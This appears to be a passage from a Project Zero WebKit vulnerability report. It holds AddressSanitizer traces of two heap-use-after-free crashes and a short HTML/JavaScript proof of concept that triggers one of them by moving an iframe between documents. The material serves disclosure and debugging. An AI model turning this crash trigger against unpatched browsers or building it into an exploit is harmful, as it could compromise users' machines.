#0 0x1031d4790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fffeb9062d9 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x22d9)
#2 0x1080ba154 in bmalloc::DebugHeap::malloc(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1907154)
#3 0x1080af4fb in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fc4fb)
#4 0x108046e95 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893e95)
#5 0x108046178 in WTF::fastMalloc(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893178)
#6 0x106a13b32 in JSC::B3::Value* JSC::B3::Procedure::add<JSC::B3::Value, JSC::B3::Opcode, JSC::B3::Type, JSC::B3::Origin>(JSC::B3::Opcode, JSC::B3::Type, JSC::B3::Origin) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x260b32)
#7 0x10743aa02 in JSC::FTL::(anonymous namespace)::LowerDFGToB3::createPhiVariables() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc87a02)
#8 0x107438f1d in JSC::FTL::(anonymous namespace)::LowerDFGToB3::lower() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc85f1d)
#9 0x10743889a in JSC::FTL::lowerDFGToB3(JSC::FTL::State&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc8589a)
#10 0x107232ee5 in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7fee5)
#11 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#12 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#13 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#14 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#15 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#16 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#17 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#18 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
Thread T20 created by T0 here:
#0 0x1031ca379 in wrap_pthread_create (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x41379)
#1 0x108097acb in WTF::createThreadInternal(void (*)(void*), void*, char const*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4acb)
#2 0x108097325 in WTF::createThread(char const*, std::__1::function<void ()>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4325)
#3 0x1080217fb in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x186e7fb)
#4 0x1073dc5c8 in JSC::DFG::Worklist::enqueue(WTF::PassRefPtr<JSC::DFG::Plan>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc295c8)
#5 0x1070919e1 in JSC::DFG::compileImpl(JSC::VM&, JSC::CodeBlock*, JSC::CodeBlock*, JSC::DFG::CompilationMode, unsigned int, JSC::Operands<JSC::JSValue> const&, WTF::PassRefPtr<JSC::DeferredCompilationCallback>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x8de9e1)
#6 0x1070913c8 in JSC::DFG::compile(JSC::VM&, JSC::CodeBlock*, JSC::CodeBlock*, JSC::DFG::CompilationMode, unsigned int, JSC::Operands<JSC::JSValue> const&, WTF::PassRefPtr<JSC::DeferredCompilationCallback>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x8de3c8)
#7 0x1071e8a07 in JSC::DFG::tierUpCommon(JSC::ExecState*, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa35a07)
#8 0x1071e9589 in triggerOSREntryNow (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa36589)
#9 0x449e46e022e0 (<unknown module>)
#10 0x107a904fc in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12dd4fc)
#11 0x107a89aca in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d6aca)
#12 0x10773d60d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf8a60d)
#13 0x1076c60dd in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf130dd)
#14 0x106ea73a6 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f43a6)
#15 0x106ea75ae in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f45ae)
#16 0x10c86d8c3 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25348c3)
#17 0x10c86d434 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2534434)
#18 0x10c881081 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2548081)
#19 0x10c87e0c2 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25450c2)
#20 0x10b01bb60 in WebCore::HTMLScriptRunner::runScript(WebCore::ScriptElement&, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce2b60)
#21 0x10b01b8a5 in WebCore::HTMLScriptRunner::execute(WTF::Ref<WebCore::ScriptElement>&&, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce28a5)
#22 0x10af4576e in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc0c76e)
#23 0x10af45e52 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc0ce52)
SUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4c7f15) in JSC::B3::Procedure::resetReachability()
Shadow bytes around the buggy address:
0x1c0e00013290: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
0x1c0e000132a0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 fc 00
0x1c0e000132b0: fa fa fa fa 00 00 00 00 00 00 00 00 fc 00 fa fa
0x1c0e000132c0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x1c0e000132d0: 00 00 00 00 00 00 00 00 fc 00 fa fa fa fa fd fd
=>0x1c0e000132e0: fd fd fd fd fd fd fd[fd]fa fa fa fa 00 00 00 00
0x1c0e000132f0: 00 00 00 fc fc fa fa fa fa fa 00 00 00 00 00 00
0x1c0e00013300: 00 fc fc fa fa fa fa fa 00 00 00 00 00 00 00 fc
0x1c0e00013310: fc fa fa fa fa fa 00 00 00 00 00 00 00 fc fc fa
0x1c0e00013320: fa fa fa fa 00 00 00 00 00 00 00 fc fc fa fa fa
0x1c0e00013330: fa fa 00 00 00 00 00 00 00 fc fc fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32191==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1099
This is a regression test from: https://crbug.com/541206.
But I think it does not seem possible to turn this into a UXSS in WebKit.
PoC:
-->
<body>
<script>
var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';
var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';
var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';
</script>
</body>
<!--
Asan Log:
==54938==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c5a80 at pc 0x0001151d388b bp 0x7fff584254c0 sp 0x7fff584254b8
READ of size 8 at 0x61a0000c5a80 thread T0
#0 0x1151d388a in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a)
#1 0x115c355e8 in WebCore::FrameView::convertToContainingView(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xad95e8)
#2 0x1176e8df7 in WebCore::ScrollView::contentsToContainingViewContents(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x258cdf7)
#3 0x1176af5d4 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegionsForFrame(WebCore::Frame const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25535d4)
#4 0x1176afb10 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegions() const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2553b10)
#5 0x115298ff9 in WebCore::AsyncScrollingCoordinator::frameViewLayoutUpdated(WebCore::FrameView&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13cff9)
#6 0x115c140f9 in WebCore::FrameView::performPostLayoutTasks() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab80f9)
#7 0x115c1c24a in WebCore::FrameView::layout(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xac024a)
#8 0x11586e89e in WebCore::Document::implicitClose() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71289e)
#9 0x115bdf621 in WebCore::FrameLoader::checkCompleted() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa83621)
#10 0x115bdcafa in WebCore::FrameLoader::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa80afa)
#11 0x11588c12d in WebCore::Document::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x73012d)
#12 0x115d8f14d in WebCore::HTMLDocumentParser::prepareToStopParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3314d)
#13 0x11592316c in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c716c)
#14 0x1158e622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)
#15 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#16 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#17 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#18 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#19 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#20 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#21 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#22 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#23 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#24 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#25 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#26 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#27 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#28 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#29 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#30 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#31 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#32 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#33 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#34 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#35 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)
#36 0x116df2baf in WebCore::timerFired(__CFRunLoopTimer*, void*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c96baf)
#37 0x7fff93728243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)
#38 0x7fff93727ece in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90ece)
#39 0x7fff93727a29 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90a29)
#40 0x7fff9371f3e0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x883e0)
#41 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
#42 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)
#43 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)
#44 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)
#45 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)
#46 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)
#47 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)
#48 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)
#49 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
#50 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
#51 0x1077d1b73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#52 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)
0x61a0000c5a80 is located 0 bytes inside of 1232-byte region [0x61a0000c5a80,0x61a0000c5f50)
freed by thread T0 here:
#0 0x10a087db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)
#1 0x10d0da25b in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c725b)
#2 0x11759427e in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x243827e)
#3 0x117592d19 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2436d19)
#4 0x115bd46be in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa786be)
#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#26 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#27 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#28 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#29 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)
previously allocated by thread T0 here:
#0 0x10a087bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10d0d901e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)
#2 0x10d074535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)
#3 0x115c14a59 in WebCore::FrameView::create(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab8a59)
#4 0x115bd459c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7859c)
